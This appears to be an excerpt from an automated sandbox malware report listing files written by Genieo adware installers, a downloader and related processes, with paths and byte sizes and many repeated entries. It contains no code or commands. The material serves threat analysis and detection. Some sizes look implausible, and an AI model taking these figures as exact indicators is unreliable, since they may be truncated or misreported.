C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\conf\partnerBannedList.dat (66 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_next.png (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\off.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002_old\img (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\genieo-16icon-browser-disabled.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\error.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_next.png (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\conf\partner.properties (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\tray_normal.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-1.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\fr_text.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_rgn_image.bmp (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\firefox-bar-16.png (586 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\css\notify_partner.css (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sethpButton.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\prep_env.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\uac_retry.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\ru_complete.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\error.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\prep_env_err.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\text\text.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\ru_text.properties (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\dfImg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\1_downloading.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-3.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\network_retry.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\en_text.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\desktop.ico (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-3.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo_old\text (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\fr_complete.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\icon-16-enabled.png (537 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\partner_uninstall.exe (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-disable.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsvDA78.tmp (25714 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-disable.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\firefox-bar-24.png (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\hide_notification.png (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-4.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-4.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\3_mapping.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\4_creating.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\4_creating.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_prev.png (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_next.gif (855 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\footer_right_logo.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\genieo-16icon-browser.png (537 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-enabled_18px.png (821 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\noItems.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\tray_awaitingMessage.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-1.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\off.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo_old\img (24 bytes)
The process cmdshell.exe:3084 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Windows\SysWOW64\3280701.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\rebirth[1].htm (1 bytes)
The process genieo_setup.exe:1552 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\cmd_close.gif (840 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\js\partnerConfig.js (937 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\2_collecting.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\1_downloading.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\js\partnerConfig.js (937 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_prev.png (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\icon-16-disabled.png (646 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-enable.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\down1.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\collapse.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_next.png (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\gim394750002\genuninstallui.exe (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\genuninstallui.exe (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\text\LicenseAgreement.txt (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\down1.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\tray_awaitingMessage.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\conf\partner.properties (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\firefox-bar-24.png (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\install_icon.ico (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\down2.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\complete.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\notification_rgn_image.bmp (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\prep_env_err.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-2.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\text.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\GenericApp.icns (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\icon-16-enabled.png (537 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\prep_env.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\down3.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\desktop.ico (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\enabled_nav_next.gif (847 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\css\partner.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\tray_normal.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-disabled_18px.png (914 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\cmd_close.png (155 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\genieo-16icon-browser-disabled.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\2_collecting.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\redHome.png (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\gim394750002\partner_uninstall.exe (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\icon-16-disabled.png (646 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_next.gif (847 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\down3.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\text\en_text.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_prev.png (153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_next.png (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\bin\license.exe (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\network_retry.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\hide_notfication_seperator.png (281 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\expand.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\css\partner.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\LicenseAgreement.txt (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\uac_retry.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_next.gif (847 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\firefox-bar-16.png (586 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\enabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-enabled_18px.png (821 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\down2.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-disabled_18px.png (914 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqB2BD.tmp (25714 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\3_mapping.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\favicon.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-enable.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_prev.png (153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\GenericApp.icns (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_next.gif (855 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\install_icon.ico (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\favicon.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\complete.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-2.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disabled_nav_next.gif (855 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\conf\partnerBannedList.dat (66 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\conf\partnerBannedList.dat (66 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqB2BE.tmp\fct.dll (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_next.png (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\off.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\genieo-16icon-browser-disabled.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\error.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_next.png (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\conf\partner.properties (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\tray_normal.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-1.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\fr_text.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_rgn_image.bmp (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\firefox-bar-16.png (586 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\css\notify_partner.css (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sethpButton.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\prep_env.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\uac_retry.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\ru_complete.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\error.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\prep_env_err.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\text\text.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\ru_text.properties (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\dfImg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\1_downloading.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-3.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\network_retry.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\en_text.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqB2BE.tmp\KillProcDLL.dll (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\desktop.ico (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-3.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\fr_complete.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\icon-16-enabled.png (537 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\partner_uninstall.exe (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-disable.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-disable.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\firefox-bar-24.png (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\hide_notification.png (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-4.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-4.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\3_mapping.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\4_creating.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\4_creating.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_prev.png (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_next.gif (855 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\footer_right_logo.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\genieo-16icon-browser.png (537 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-enabled_18px.png (821 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\noItems.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\tray_awaitingMessage.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-1.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\off.ico (1 bytes)
The process WebPlayer.exe:2984 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\down[1] (748 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\http_403_webOC[1] (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\ErrorPageTemplate[1] (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\httpErrorPagesScripts[1] (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\errorPageStrings[1] (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\config[1].json (778 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\info_48[1] (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\bullet[1] (447 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\background_gradient[1] (453 bytes)
The process STab_Down_6.0.6.6.exe:3216 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\XTab_v4.0.exe (152612 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\XTab_4.0.2.1716[1].exe (263908 bytes)
The process App Lid-codedownloader.exe:3264 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\manifest[1].xml (25 bytes)
The process converter.exe:4068 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gsdll32.dll (648640 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_ops.ps (3122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewpcx.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019064l.pfb (18530 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_m.xbm (961 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\c059016l.pfb (28130 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\showpage.ps (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\c059036l.pfb (27394 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dbt_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\Setup.exe (29868 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_mgl_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\ppath.ps (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdfwrite.ps (818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pcharstr.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\addxchar.ps (578 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_kanji.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cmap.ps (2210 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\b018015l.pfb (23234 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\b018012l.pfb (26066 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_t.xbm (353 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_lev2.ps (6242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf2dsc.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pv.sh (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_l2img.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pfbtopfa.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n022003l.pfb (22930 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_sym_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019003l.pfb (15714 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\impath.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\wrfont.ps (2642 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_s_m.xbm (615 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_rbld.ps (1106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_main.ps (8594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cidcm.ps (2210 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\winmaps.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_t.xpm (633 bytes)
